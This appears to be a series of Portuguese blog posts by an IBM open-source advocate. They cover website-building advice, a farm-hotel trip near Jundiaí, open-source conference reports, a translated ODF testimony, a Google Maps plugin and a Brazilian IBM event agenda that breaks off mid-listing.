Não conte para ninguém, mas site e blog são praticamente a mesma coisa, mas optando pelo formato de blog abre um leque de opções do uso de ferramentas já prontas para facilmente gerenciar seu conteúdo. Isso significa que seu site (ou blog) ficará pronto mais rápido (instantaneamente, na verdade), com mais funcionalidades, nasce bonito, e organizado de um jeito já familiar para as pessoas, além de ser interativo.

Outra vantagem de um blog é que você mesmo vai poder configurar e atualizá-lo tão facilmente quanto escreve um e-mail.

O visual de um sistema de blog como o WordPress é definido pelo tema usado. A idéia de temas pode ser comparada a uma roupa que se veste: troque de roupa e mude seu visual sem tocar no conteúdo, da mesma forma que troca-se o tema de seu blog sem interferir no conteúdo textual etc.

Há uma infinidade de temas gratuitos genéricos prontos na web, mas para uma empresa, estabelecimento, etc o ideal é contratar um webdesigner para criar (ou adaptar) um tema específico, com o seu logotipo e a sua cara. O trabalho técnico para executar esse trabalho dura aproximadamente 1 semana, e no caso do WordPress.org, o webdesigner deve ter conhecimento de PHP, além dos básicos XHTML e JavaScript (não precisa lembrar esses nomes, só garanta que seu webdesigner conhece tais tecnologias).

Em que computadores seu site vai rodar, onde hospedar ?

O custo mensal para se ter um blog/site é baxíssimo. No Brasil pode-se contratar excelentes provedores de espaço como a Insite por aproximadamente R$16 por mês. Já incluso todas as ferramentas necessárias para criar o blog, como o WordPress.org.

DreamHost bannerO provedor que escolhi para este meu site é o DreamHost que fica nos EUA. Por uns R$70 por ano eles me dão 230GB de espaço, mais banda praticamente ilimitada e um ótimo serviço. Alí pode-se rodar um blog WordPress.org, ou outros softwares que facilitarão a sua vida para gerenciar o conteúdo, seja textos, fotos, multimídia, etc: Drupal, Joomla, Gallery etc.

Seu site vai morar em computadores que rodam Linux (por oferecer maior segurança e estabilidade) e seus usuários Linux, Windows, Mac ou qualquer outro poderão navegar nele sem problema.

Evite Flash

Flash é a tecnologia que permite animações bonitinhas em sites da web, mas que começou a ser impropriamente usada para fins mais centrais de alguns sites, até o ponto enlouquecido de o site inteiro ser feito em Flash.

É ruim para seus visitantes: Flash é uma tecnologia proprietária, e nem todos os seus visitantes vão tê-lo instalado. E os que tiverem talvez o terão numa versão antiga (você lembra de ter atualizado seu Flash alguma vez?). Visitantes que usam Linux por exemplo — 20% da web aproximadamente — em geral não tem. Não exclua seus usuários.

É ruim para seu blog: Há uma ciência oculta na web chamada Search Engine Optimization (ou Otimização Para Sistemas de Busca), em que profissionais especializados conseguem fazer um site aparecer no topo da pesquisa por palavras em sites como o Google, Yahoo, MSN Search, etc. Bem, qualquer palavra ou link (isso inclui menus que levam ao texto) contidas em arquivos Flash serão invisíveis ao Google, fazendo seu blog praticamente desaparecer em resultados de busca. Os potenciais clientes que usam o Google e companhia para procurar coisas que você vende também desaparecerão.

Use Flash somente em coisas marginais e mesmo assim em elementos que não interferem na informação que seu site/blog provê.

Existem outros browsers

Lembre-se que o browser que você e seu produtor de site usam pode não ser o mesmo de todos os seus visitantes. O Firefox já usado por uns 30% da web. Para acertar neste ponto, garanta que seu blog é bem visto no Firefox, Safari (popular no Mac), Opera (popular em celulares) e Internet Explorer.

A Internet não é um panfleto de propaganda

Uma das coisas mais inúteis e irritantes de muitos sites é a tal da apresentação inicial, geralmente feita em Flash. Claro que há o link para “pular a animação” mas se este também estiver embutido no Flash pode dizer adeus a alguns visitantes: o resto de seu site é inacessível e contribui para a tal exclusão digital.

Um panfleto é recebido na rua de forma passiva, e a capa deve ser atraente para que o usuário queira abrir e ver o resto. Na Internet é diferente. Dificilmente alguém vai “cair” no seu site por acaso. As pessoas ativamente te clicaram porque acreditam que você tem a informação que elas precisam. Não as aborreça com essas apresentações iniciais. Em suma, isso só serve para duas coisas: dar uma desculpa ao webmaster que você contratou para te mostrar seus conhecimentos em operar o programa que cria aquilo, e gastar seu dinheiro pelas horas de trabalho cobradas.

Use melhor as horas pagas ao seu web-designer e peça para ele criar um site/blog semântico, que os mecanismos são capazes de ler.

Morte aos Popups

Sobre as tais janelas saltitantes que surgem quando clicamos em links de sites mal feitos, saiba que browsers modernos corretamente as bloqueiam. Se você as vê na hora que está testando seu site pela primeira vez, provavelmente foi porque o browser foi explicitamente configurado para deixá-las saltar. Em geral seus usuários não as verão.

Os popups tem outro sério problema: em sites mal feitos, certas informações preciosas só podem ser encontradas dentro de popups, e como essas janelinhas estão fora do fluxo de navegação normal (como Flash) essas informações também serão invisíveis ao Google e companhia, e não aparecerão nos resultados de busca.

Estabeleça a idéia de que todo pedaço de informação em seu site deve poder ser acessível diretamente por links externos (também conhecidos por “permalinks“), e não só navegando via a página principal.

Seus clientes querem te ligar

Você ficará surpreso em saber quantas pessoas tem preguiça de ler ou gastar 5 minutos (ou mais, se o site for desestruturado) navegando em seu blog para encontrar o que procuram.

Para aproximá-las de você, deixe seu telefone com código de área visível em todas as páginas, por exemplo no final de cada uma. Só e-mail não basta. Muito menos formulário para entrar em contato. Lembre-se: de qualquer forma, antes da Internet o único jeito de contactarem seu estabelecimento era por telefone.

Se o seu estabelecimento for um serviço, restaurante, hotel, loja, vai perceber que a maioria liga para saber onde fica, preços, se está lotado, o que há no cardápio, etc. Quando as perguntas freqüentes ficaram óbvias, trate de criar páginas com respostas claras no seu site, mapas interativos como o abaixo, etc.

map
map
Restaurante Maha Mantra
map
Cantina do Mello

Evite tecnologias proprietárias

Use padrões abertos. Eles estão disponíveis, são mais baratos, e te dão mais flexibilidade que as tecnologias proprietárias.

Não é exatamente o webdesigner quem deve escolher as tecnologias usadas em seu site. Ele vai te sugerir as que ele conhece, mas não necessariamente são as melhores para você.

Um site/blog desenvolvido com tecnologias proprietárias te forçará a ter que pagar por elas pelo resto da vida de seu site. E saiba que a cultura da Internet criou diversas tecnologias abertas, muitas vezes melhores, muitas vezes gratuitas, que te dão escolha, poder de negociação, etc.

Veja uma comparação:

Tecnologias Proprietárias (evite) Tecnologias Abertas (prefira)
Flash DHTML, Ajax, XHTML+JavaScript
ASP, ASP.NET JSP, PHP
.NET, C#, Cold Fusion, Delphi etc Java, Java Enterprise ou J2EE
Windows ou qualquer outro sistema operacional Linux
Mídia em formatos WMA, WMV e Real Mídia em formatos MP3, AAC, MPEG e Xvid (ou DivX)

Outros detalhes

  • Seu site ou blog deve usar a codificação UTF-8 ou Unicode. Esta técnica é a garantia de que acentos vão aparecer corretamente em qualquer browser e sistema operacional.
  • Evite também frames. Eles nasceram a partir de um erro de projeto, são considerados obsoletos, tem problemas similares aos popups e Flash, violam padrões, e seus criadores se arrependeram de te-los criado.

Borboletas do Japi

A 40 minutos de São Paulo está um dos melhores lugares para se passar um feriado: Fazenda Montanhas do Japi. E foi justamente nesse ótimo hotel fazenda que passamos a última Páscoa.

Encrustado nos pés da área de preservação da Serra do Japi, é longe o suficiente para abafar o barulho da cidade, e perto o suficiente para não haver desculpas nem dramas para cair na estrada. Logo ali, em Jundiaí.

(interaja com o mapa para conhecer a região)

O hotel fazenda é um complexo de 8 lagos rodeado por morros de mata virgem e flores perfumadas. É muito bem cuidado, com bosques de árvores, campos de grama aparada e borboletas, muitas borboletas. Uma visão bucólica do paraíso.

Casa principalA Casa de Pedra é a principal e tem uns 3 quartos para hóspedes, lounge, lazer, etc, e fica na subida de um morro, de frente para o lago principal, o que lhe confere uma bela vista de contemplação. Mas ficamos na Casa Gênio, afastada uns 400m (veja no mapa) e praticamente no meio do mato, com 2 suites, sala, cozinha e varanda, cujo caminho até a casa principal passa por um bosque de amoreiras, com borboletas por toda parte.

Suzana e Hanah lideram tudo não como donas de uma pousada, mas como anfitriãs em sua sala de estar, almoçando junto e contando as histórias de gerações passadas da família e da fazenda, a relação da região com a cultura da uva, e depois eucaliptos, etc.

A casa principal foi construída sobre ruínas seculares de jesuítas. Para evitar intervenções de estilos muito contrastantes, toda a arquitetura nova é rústica, mas com um inconfundível toque feminino e confortável. As constantes borboletas dão o toque final ao visual leve e colorido.

Trilhas na mataPara os aventureiros há as trilhas por dentro da Serra do Japi, beirando rios de águas cristalinas, árvores primárias, perdendo-se e achando-se ao sair em outro ponto inesperado da fazenda, despreocupadamente, guiado pelas infindáveis borboletas.

É tão perto que no sábado chamamos os amigos de São Paulo para virem almoçar e passar o dia, nadar no lago, remar no caiaque, andar a cavalo, contemplar as borboletas na paisagem florida.

É tão longe que a noite vimos um céu escuro e estrelado, típico dos lugares afastados. Aí a lua cheia logo nasceu e mandou as estrelas embora. Mas no dia seguinte, as borboletas continuavam lá.

Os bons cavalos nos levaram ao topo de um morro cuja paisagem lembrava Stonehenge. Muitas rochas. E borboletas. E o Pico-do-Jaraguá lá longe.

As redes sob os eucaliptosFazer três refeições daquelas por dia era desencorajador para nós, visitantes deslumbrados com a leveza de tantas borboletas. No café da manhã, além dos bolos e pães caseiros, deixavam umas chapas de ferro sobre o fogão a lenha para prepararmos nossos próprios sanduíches ou panquecas. Tinha que preparar sempre dois: um para matar a fome e outro para exercitar a pretensão de sanduicheiro-chapeiro-cozinheiro.

O almoço era concorrido com quem só vinha passar o dia, mas ao sentarmos nas mesas da varanda alta, contemplando os lagos e as borboletas, tudo se acalma. Se demandávamos demais do almoço, as redes de balanço sob o bosque de eucaliptos gigantes nos chamavam para um cochilo. Quanto mais altos, mais sensíveis são os eucaliptos às brisas que vem e vão, e juntos formavam o sonoro coro da canção de ninar que combinava com a rede.

Mesas na varanda altaO sino do lanche da tarde nos despertava, e aí as estrelas eram o suco de erva cidreira e a torta de banana com aveia.

À noite prometíamos tomar só uma sopa, mas não dava para resistir. A situação se complicou no sábado à noite: o forno de pizza estava quente, e a pretensão de cozinheiro pôde novamente ser exercitada ao montar as deliciosas redondas. Era a última noite.

No domingo choveu como o batismo dos céus. As borboletas foram se esconder, mas não por muito tempo. Logo voltaram.

Mas já era hora de partir. O consolo ao voltar para São Paulo era o céu de um cinza homogêneo e denso como uma redoma, mas às seis da tarde o sol atravessava-o por baixo alaranjando toda a cidade. Era um lindo jogo de contrastes brilhantes e cinzentos que fez surgir um arco-íris intenso estampado sobre o cinza. Pudemos vê-lo inteiro, de ponta a ponta. Cena de rara beleza na cidade.

Naquela hora, já em São Paulo, lembramos das borboletas. E sentimos saudades delas.

(fotografias e seus autores estão no site da fazenda)

Pré-FISL em São Paulo

Acabei de sair do evento Pré-FISL em São Paulo, organizado pela 4Linux.

Foi ótimo. Com palestras e palestrantes de alta qualidade. Confira:

  • Josh Berkus, do PostreSQL, esclareceu a evolução do projeto e comunidade. Contou que a versão 8.3 do PostreSQL vai suportar DBs de vários terabytes, e que a performance da versão 8.2 atual já é comparável com o MySQL. Contou também que os nichos do PostreSQL e do MySQL são diferentes. O primeiro está focado em grandes bancos, enquanto o MySQL tende a usos exóticos ou a bancos pequenos ou até em RAM. Sobre suporte a XML do PostgreSQL mostrou os primeiros passos, mas explicou que não chegam nem perto do DB2 nesse ponto. Outro gráfico interessante é a relação do custo-benefício comparado a um “banco de dados proprietário” de cor vermelha: 80% do benefício por 15% do custo total de propriedade.
  • Maddog fez uma apresentação de tom idealista sobre thin clients, contando como terminais burros eram usados antigamente e a vida das pessoas era mais fácil. Argumentou que o projeto One Laptop Per Child é bonito mas o que importa não é o hardware e sim a conectividade em todo lugar. Quando questionei que muitas empresas já usam thinclient mas em Windows, e que o que falta é uma abordagem de mudança cultural menos infraestrutural e mais no nível das aplicações (convertendo-as para web ou para padrões abertos), ele disse que é só uma questão de volume. Quero ver… Seja como for, nós adultos também queremos um laptop conectado !
  • Jomar Silva, diretor geral da ODF Alliance Brasil, falou por uns minutos sobre ODF e sua importância para os usuários, empresas e desenvolvedores de aplicações.
  • Cezar Taurion falou pela IBM com uma palestra entitulada “Renascimento 2.0”, onde usou seu raciocínio claro e pragmático para explicar o modelo Open Source, e como ele se encaixa num modelo empresarial. Falou sobre o conceito Long Tail e como ele está relacionado a era do Mundo de Pontas.
  • Kristian Kielhofner falou sobre o Asterisk. Muito interessante. Mas a maior sensação foi seu celular Nokia que suporta SIP. Ou seja, para qualquer contato de sua lista telefônica, ele pode fazer uma ligação normal (por GSM) ou por VoIP, gastando bytes de seu plano IP (mais barato) e economizando minutos de seu plano de voz (mais caro). Segundo ele, os aparelhos Nokia da linha E e N estão anos a frente de qualquer outro fabricante por sua integração com VoIP. Ele consegue rotear seu ramal do trabalho, ou seu telefone de casa para seu celular, não por followme, mas por IP — Nokia é o celular dos geeks. Mostrou também um gadget que parece um isqueiro com porta ethernet: trata-se de um computador com WiFi que tem 256MB de RAM e AstLinux já instalado, boota em segundos com Linux, Asterisk e um firewall, e lhe serve como uma central telefônica portátil para viagens.
  • Amauri Zavatin, da Caixa Econômica, impressionou todos contando como o banco social está aos poucos usando Linux em todos os lugares. Dentro de um ano, todos os terminais dos caixas e ATM serão thin clients Linux. BrOffice.org já está sendo massivamente usado, com ordem da presidência, e há prazo de 6 meses para desinstalar o MS Office. Intranet foi toda redesenvolvida em Java e Zope, e está servindo como piloto para a próxima Internet do banco. Diminuiram em 70% os gastos com impressão porque começaram a controlar seu uso com ferramentas open source. Des-terceirizaram todo o negócio das casas lotéricas (por causa das notícias de corrupção) redesenvolvendo todas as aplicações internamente com Java e Linux, e o projeto saiu por uma fração do que foi previsto. Etc etc etc. Esta palestra serviu como um termômetro do uso de Open Source de forma corporativa, responsável e séria.
  • Louis Suarez-Potts, da Collab.net, fez uma palestra emocionada sobre OpenOffice.org e ODF, convocando mais colaboradores para os diversos projetos atrelados ao OOo. Explicou que pode-se contribuir para a suite em sí, mas também para os subprojetos de marketing, empacotamento, artwork, testes, plugins e extensões.

O evento fechou com um coquetel informal onde reencontrei velhos amigos como o Luiz Blanes e outros.

A casa estava cheia, e espero que o evento se repita ano que vem. Tem tudo para se tornar tradição em São Paulo.

Um Tratado sobre Padrões Abertos e ODF

Bob Sutor, diretor da IBM que tem a missão de fomentar Padrões Abertos e Open Source no mercado, tem também a responsabilidade de comunicar a importância do OpenDocument Format (ou ODF).

Publicou em seu blog um pronunciamento feito ao congresso do estado do Texas, que está em fase de votar uma lei a favor da adoção do ODF. É um tratado edificante sobre a importância social e mercadológica dos Padrões Abertos (instanciados aqui no ODF). As idéias e raciocínio deste documento podem ser facilmente adaptados para serem ouvidos por qualquer orgão governamental, instituição pública ou privada do Brasil também, quanto mais agora devido a criação da nossa própria Aliança ODF.

Eis uma tradução integral:

2007/04/09: Revisada a tradução, a semântica, sintaxe e gramática por Tatiana Cymbalista.

Boa tarde/noite, Sr. Presidente e membros do Comitê. A IBM apóia este projeto de lei. Este projeto de lei trata do futuro, de mais concorrência e inovação e de dar mais opções para o Texas. É completamente consistente com a direção tecnológica e de propriedade intelectual da indústria do software.

Os atuais formatos de arquivos nos quais alguém grava documentos de escritório, usados pela maioria dos senhores e de seus cidadãos, são baseados em tecnologias e práticas dos anos 70, 80 e 90, pelas quais algumas companhias “prendiam” clientes a seus produtos e atualizações. Isso não é mais aceitável hoje em dia.

Quando os senhores e seus cidadãos encontram-se realmente restritos a um único fornecedor de software para acessar informações governamentais, vocês e eles pagam o que eu considero taxas. Padrões abertos evitam isso.

A primeira taxa é a diferença entre o que você precisa pagar para aquele fornecedor versus o custo mais baixo que pagaria se múltiplos fornecedores existissem e os preços tivessem que ser competitivos. Você também teria que pagar uma taxa de inovação. O fornecedor único tem motivos limitados para melhorar o produto. Idéias refrescantes de atores novos como os empreendedores do Texas, são mantidas fora da categoria do produto. Isso é ruim.

Aqueles que são contrários a este projeto de lei estão, em essência:

  • confortáveis em ter um único fornecedor;
  • satisfeitos com as políticas de licitação que permitem haver um único fornecedor de software de documentos para o governo;
  • razoavelmente felizes em pagar as taxas financeiras e de inovação acima.

A IBM não se contenta com este status quo. Nem os autores desse projeto de lei. Nem a maioria das indústrias; aquelas nas áreas de ciências naturais, educação, saúde, e assim por diante, que estão tendendo para padrões abertos. Com o advento da Internet, beaseada em padrões abertos como HTML, o valor dos padrões abertos reais tem sido comprovado.

Pensem sobre quão mais fácil, mais acessível, mais transparente é para vocês colaborar dentro do governo e se conectar com seus cidadãos graças à Internet e ao correio eletrônico, a blogs e a tudo aquilo que surgiu a partir de padrões abertos. É chegada a hora de levar esse poder de colaboração aos documentos e abri-los, dando controle aos governos e escolha aos cidadãos.

A IBM se juntou aos nossos colegas da indústria para trabalhar em um padrão aberto para formatos de arquivos, chamado de OASIS/ISO OpenDocument Format (ODF). Formatos de arquivos são meras especificações de como um documento é estruturado — cabeçalhos, rodapé, parágrafos — e de como ele deve ser salvo e intercambiado. O formato OpenDocument tem sido desenvolvido aberta e ativamente por uma comunidade global de especialistas de muitas organizações e tem sido amplamente implementado por vias independentes, tanto de código fonte aberto como proprietário.

Sua taxa de adoção está aumentando. Adolescentes estão usando-o. Políticos estão usando-o. Alguns diretores de tecnologia em organizações que oficialmente só usam formatos proprietários estão usando ODF em casa, quando chega a hora de gastar seu próprio dinheiro e experiência técnica para escolher produtos para seu uso pessoal. A enorme e crescente base de usuários de Open Office está gravando e distribuindo arquivos em formato ODF. A próxima geração do Lotus Notes da IBM irá suportá-lo ainda este ano.

Então por que vocês precisam de legislação sobre isso ?

Primeiro, porque o Texas, como um estado soberano e uma potência no mercado de TI, deve, na minha opinião, ser capaz de fazer o que bem entender com os documentos de escritório que cria. Isso se aplica aos documentos de hoje, mas também aos documentos que serão criados amanhã e que serão os registros históricos daqui a cinqüenta anos. Vocês têm a oportunidade de claramente afirmar a posição de que o Texas não será refém de nenhum fornecedor para acessar as informações do próprio estado.

Segundo, porque as mudanças estão acontecendo agora e os usuários vão, ao longo do tempo, usar novas aplicações com novos formatos de arquivos baseados em documento. Eu nunca encontrei um diretor de tecnologia ou pessoa da área de finanças que me dissesse que nunca usará um novo software. Então, uma encruzilhada aproxima-se rapidamente e vocês precisam fazer uma escolha: escolher um único fornecedor e pagar essas taxas que mencionei, ou adotar formatos de documentos verdadeiramente abertos, que não são ditados por um único fornecedor, fomentam competição e inovação de várias origens e provêm verdadeira escolha de provedores e seus produtos.

Eu posso garantir que o software que teremos em cinqüenta anos vai funcionar de formas radicalmente diferentes e será fornecido por provedores completamente diferentes dos que conhecemos hoje. Devemos manter nossas opções abertas e, felizmente, com ODF temos uma excelente escolha comparada com qualquer alternativa. Além do mais, pessoalmente, eu apostaria na “inteligência das massas”, na coletividade de experts em TI que verdadeiramente domina padrões abertos e poderá nos preparar para o sucesso nos próximos anos. Depender de um único fornecedor para otimizar as ferramentas de seu próprio sucesso é solução do passado.

Em terceiro lugar, para ser claro, QUALQUER UM pode implementar um padrão aberto. Esse projeto de lei trata de escolha. ODF e padrões abertos para formatos de arquivos fomentam escolha de aplicações, usos inovadores da informação, mais competição e queda de preços. Pessoalmente, eu acho que essas coisas são boas.

Em conclusão, o mundo está se deslocando para padrões abertos, não-proprietários, baseado no incrível sucesso da Internet, um sucesso que foi bem mais importante do que a posição de mercado de um único fornecedor ou as suas idéias sobre o que seria correto para o mundo.
Nós podemos fazer isso novamente, mas temos que fazê-lo com cuidado. O Estado do Texas está em posição de mostrar aos seus cidadãos e ao mundo que esse sucesso pode ser repetido e que pretende liderar esse processo. O Texas pode mostrar que a frase “padrão aberto” significa mais do que um departamento de marketing de uma empresa diz que é.

Sr. Presidente e membros do comitê, padrões abertos de documentos são a apólice de seguro para seus documentos, em oposição ao risco de perda de documentos históricos esperando para acontecer. Eu vos agradeço pela oportunidade de testemunhar a favor do projeto de lei, e estou a disposição para responder a qualquer dúvida que tiverem.

Mapas Personalizados no Google Maps

Confira o novo Google Maps, que já era na minha opinião o serviço mais prático e legal da Internet.

A partir de hoje (não lembro de ter visto isso ontem) pode-se criar mapas personalizados com marcadores coloridos e balões com informações formatadas, como este mapa com legendas de Paraty e região.

Além do mais, pode-se exportar essas informações para um arquivo KML, importável no Google Earth. Mas como KML é um idioma XML aberto, pode-se usa-lo como meta informações geográficas em quaisquer outras aplicações. A imaginação do desenvolvedor de aplicações é o limite. Discretamente, KML irá se tornar um padrão aberto e universal para descrever metainformações em mapas.

Havia desenvolvido um plugin para WordPress (ou qualquer outro sistema de blog, ou página simples) para embarcar mapas interativos dentro de posts, capaz de incrementar posts como este (na verdade, a maioria de meus posts sobre viagens tem mapas interativos). Ele ainda é muito prático, porque a API do Google Maps ainda não provê um serviço para desenhar os novos mapas personalizados fora do próprio Google Maps. Mas duvido que isso demore a acontecer, e quando acontecer, das duas uma: ou o plugin vai ficar muito mais simples, ou ele vai se tornar completamente obsoleto.

Eu sou tão fascinado por mapas que provavelmente fui um cartógrafo em outra encarnação.

E para quem não sabe, o Google Maps e o GMail são os sites populares que primeiro usaram os conceitos de AJAX.

Evento de Virtualização da Novell

Novell Virtualization Tour

Não podemos deixar de marcar nossa presença no evento de virtualização da Novell. Confira as datas e cidades:

Brasil América Latina

No track da IBM vou fazer uma apresentação nova sobre virtualização, incluindo o tema quente da paravirtualização, mas passando também por virtualização de storage, virtualização de aplicações, e outras virtualizações pouco conhecidas, até chegar nos conceitos de Grid e SOA que são as vertentes mais sofisticadas de virtualização.

Inscreva-se gratuitamente nos links acima e garanta sua vaga.

ODF Alliance in Brazil

Yesterday was announced the ODF Alliance Chapter Brasil, being the fourth country to create this initiative, after US, India and Poland.

The founder members are the Brazilian offices of IBM, Red Hat and Sun. Jomar Silva, the director, told me this:

My understanding is that the Brazilian [ODF Alliance] operation has the mission to execute the work proposed by the ODF Alliance in our country. We are partners and fight together the same battle, exchanging experiences (and this is a very important point) so lessons learned with migration and adoption of ODF in other countries (governments and companies) may be used here.

Many software support today reading and writing of documents in the OpenDocument format, being OpenOffice.org the most popular. The user gains freedom of choice, becomes able of negotiation, and can choose for the best price-benefit performance. This user-suppliers dynamics works as a fuel for innovation.

ODF, being based on open standards as XML, plus having a free license, plus to be already and ISO standard (two steps ahead of OOXML, proprietary competitor by Microsoft), is a mark in IT’s history, when for the first time the user is truly the independent owner of his documents. This is simply a very powerful idea.

The Brazilian chapter of the ODF Alliance will focus, in its first days, to setup its web site — probably at www.br.odfaliance.org —, and to define policies to accept new members as companies, institutions, user groups and communities.

ODF Alliance, Capítulo Brasil

Foi anunciada ontem para a mídia a ODF Alliance – Chapter Brasil. Somos o terceiro país no mundo que criou esta iniciativa, depois da Polônia e da Índia.

Tem como membros fundadores as sucursais brasileiras da IBM, Red Hat, Sun e Jomar Silva como diretor, que me contou o seguinte:

Eu entendo que a operação brasileira tem como missão e papel realizar o trabalho proposto pela ODF Alliance em território brasileiro. Somos todos parceiros e lutamos juntos a mesma batalha, trocando experiências (e este é um ponto muito importante) para que as lições aprendidas com a migração e adoção do ODF por outros países (governos e empresas) possam ser utilizadas aqui.

Diversos softwares já oferecem hoje suporte de leitura e escrita de arquivos no formato OpenDocument, sendo o mais conhecido a universal suite OpenOffice.org. O usuário então ganha com isso liberdade de escolha, poder de negociação, e poder optar pela melhor relação custo-benefício. Essa dinâmica usuário-fabricantes funciona como combustível para a inovação.

ODF é um patrimônio de seus usuários e da humanidade. Baseado em padrões abertos como XML, somado aos fatos de ter uma licensa de uso livre, e de já ser um padrão ISO (dois passos à frente do OOXML, concorrente proprietário da Microsoft), assinala um marco na história da TI onde pela primeira vez o usuário é verdadeiramente dono independente de seus próprios dados, garantindo assim sua longevidade e interoperabilidade. É simplesmente uma idéia muito poderosa.

O ODF Alliance – Chapter Brasil tratará, em seus primeiros dias de vida, de levantar seu site em português — provavelmente em www.br.odfalliance.org —, e em definir critérios para receber novos membros, como empresas, instituições, grupos de usuários e comunidades.

Inclusão Digital

Já posso desencarnar feliz porque tenho um blog popular.

Meu post sobre Aquecimento Global é o campeão de audiência com 246 comentários neste exato momento, mas se você for verificar agora, o número já deve ter crescido. Até o final do ano deve facilmente chegar a 400 comentários.

Escrito numa noite mal dormida, de pesadelos, após ter assistido o filme do Al Gore, nunca tinha imaginado que seria tão visitado, e nem por esse tipo de público: a maioria são estudantes fazendo trabalho para a escola.

Uma conhecida que corrige redações de vestibular me disse uma vez que o nível dos textos é muito baixo. Confesso que achei que ela estava exagerando e sendo pessimista demais, mas minha opinião mudou depois do meu post popular.

Veja alguns comentários ali:

E a lista não pára…

A inclusão digital está acontecendo mais rápido do que qualquer outra inclusão.

Aproveitando, meus outros posts populares são o de download de música, o do Google Maps para WordPress, e o do tema do meu blog.

IBM no Oracle Open World

A IBM vai participar do evento Oracle Open World, nos dias próximos dias 27, 28 e 29 de março.

Local

Transamérica Expo Center, São Paulo.

Agenda

Parceiros, Cezar Taurion, outros especialistas da IBM e também eu, vamos mostrar casos de sucesso e novas idéias sobre diversos assuntos, inclusive Linux, Service Oriented Architecture, Padrões Abertos, Software as a Service, novidades nas plataformas de hardware da IBM etc. Confira a agenda:

Dia 27/03

11h00 – 11h40 System p (Unix) para Soluções Oracle

Conheça a tecnologia POWER IBM, com todo poder de processamento e capacidades avançadas de virtualização e alocação dinâmica de recursos. Ideal para empresas com missão crítica e com necessidades de flexibilização da sua área de TI, além de ser uma combinação perfeita com diversas soluções Oracle.

Palestrante: Mauro Minomizaki

11h45 – 12h15 Caso de sucesso – Unilever: Buscando a excelência através da implementação de ITIL

Com a implementação dos processos ITIL suportados pelo Siebel, a área de IT da Unilever Latin America busca consolidar sua excelência operacional para entregar aos seus clientes um serviço cada vez melhor.

Palestrante: José Ferroli (Unilever)

14h00 – 14h40 Modelos de negócio para padrões abertos e open source

A importância dos Padrões Abertos para a indústria e sociedade. Como empresas estão tirando vantagem disso. Modelos de negócios para Open Source, e como escolher entre Open Source e Closed Source.

Palestrante: Cesar Taurion (IBM)

14h50 – 15h20 Software como Serviço: rompendo os limites do modelo de aplicativos sob demanda

Conheça esta forte tendência do mercado, o modelo de software como serviços. Uma forma lexível de compra de soluções que consiste na entrega das funcionalidades de uma aplicação com o pagamento baseado em sua utilização.

Palestrante: Marcos Prete (IBM)

15h30 – 16h00 Parceiro: MPL

Soluções para empresas em que a performance dos projetos e gerenciamento dos riscos são críticos. Controle os custos de seus projetos em tempo real.

Palestrante: MPL

16h10 – 16h40 Soluções financeiras para viabilizar seu projeto

O Banco IBM apresenta uma série de alternativas para viabilizar seu projeto de TI. Conheça as melhores e mais variadas soluções financeiras para levar seu projeto adiante.

Palestrante: André Sales (IBM); Antonio Ramos (IBM)

16h40 – 17h20 IBM Service Management for Oracle Applications – Oracle Optimization and Management

O IBM Service Management alavanca as práticas ITIL para reduzir tempo, custo e risco na entrega e gerenciamento de aplicações Oracle em ambientes heterogêneos, ajudando as empresas a reduzir o custo total de suas operações e a liberar os orçamentos para investimentos em inovação.

Palestrante: Jorge Cordenonsi

17h20 – 18h00 Por que Oracle no mainframe?

A Oracle e a IBM anunciaram em Outubro de 2006 uma forte parceria de aplicativos e Banco de Dados em plataforma mainframe – System z. Além disso, algumas dessas tecnologias já estão rodando em ambiente Linux do mainframe, com um ótimo TCO para clientes que buscam consolidação.

Palestrante: Roberto Santos (IBM)

18h00 – 19h00 Coquetel System z

Dia 28/03

11h00 – 11h40 Soluções Mid-Range de Storage para Oracle

Conheça as soluções voltadas ao mercado de pequenas e médias empresas, onde o volume de dados vem crescendo a cada dia. Além disso, veja os diferenciais com soluções Oracle e os últimos lançamentos voltados para esse mercado.

Palestrante: Wellington Menegasso

14h00 – 14h40 Sizing de Infraestrutura para Soluções Oracle

Veja como a IBM investe fortemente em seu Centro de Competência, bem como na ferramenta de sizing, garantindo o bom funcionamento do seu processo e trazendo economia às empresas, além de ser uma ótima oportunidade aos nossos parceiros de negócios.

Palestrante: Guilherme Araujo (IBM)

14h50 – 15h20 Software como Serviço: rompendo os limites do modelo de aplicativos sob demanda

Conheça esta forte tendência do mercado, o modelo de software como serviços. Uma forma flexível de compra de soluções que consiste na entrega das funcionalidades de uma aplicação com o pagamento baseado em sua utilização.

Palestrante: Marcos Prete (IBM)

15h30 – 16h00 Parceiro: HB Global

Soluções JD Edwards Oracle para Transporte e Logísitica

Palestrante: HB Global

16h00 – 16h30 Soluções financeiras para viabilizar seu projeto

O Banco IBM apresenta uma série de alternativas para viabilizar seu projeto de TI. Conheça as melhores e mais variadas soluções financeiras para levar seu projeto adiante.

Palestrante: André Sales (IBM); Antonio Ramos (IBM)

16h30 – 17h10 Soluções Siebel com plataforma Unix IBM

Conheça as funcionalidades de nossa plataforma System p (UNIX) com o aplicativo Siebel Oracle, mostrando todo o valor agregado e benefícios que as empresas podem ter optando por essa solução.

Palestrante: Eduardo Pacini (IBM) e Sérgio Saldanha (Oracle)

17h20 – 18h00 Power Net – um programa direcionado para ISVs

PowerNet é um programa voltado a desenvolvimento de novos ISVs na plataforma System p. Venha conhecer todos os benefícios do programa e como a IBM está trabalhando com a Oracle. Extremamente focado para parceiros de negócios.

Palestrante: Marcelo Violento (IBM) e Sérgio Saldanha (Oracle)

18h00 – 19h00 Coquetel System p

Dia 29/03

11h00 – 11h40 Bladecenter com Soluções Oracle

Cada vez mais as empresas enfrentam problemas como redução de custos na área de TI, falta de espaço, problemas de refrigeração do seu CPD e gerenciamento de parques de servidores. O BladeCenter IBM pode resolver todos esses problemas com sua capacidade de

Palestrante: Ana Paula Tran

11h45 – 12h15 Caso de sucesso: Como atingir a otimização de processos com redução de custos e redução do número de transações de documentos em até 50%.

Melhoria do gerenciamento de risco, redução das complicações relacionadas a impostos e legais, melhoria da qualidade dos dados, maior cooperação dos empregados, otimização das ações da corporação, com maior rapidez nas soluções de possíveis dificuldades a

Palestrante: CVRD

14h00 – 14h40 A melhor distribuição Linux

Entenda o que são distribuições Linux, como estão posicionadas no mercado e na comunidade, as mais importantes, vantagens e desvantagens de cada uma, e como escolher a melhor para o seu negócio.

Palestrante: Avi Alkalay (IBM)

14h50 – 15h30 System i e JD Edwards: a combinação perfeita

Conheça a plataforma ideal para a solução de JD Edwards, o System i, dotado de tecnologia POWER. Possui alto poder de processamento, capacidades avançadas de virtualização e alocação dinâmica de recursos, além de ser uma máquina totalmente auto gerenciáve

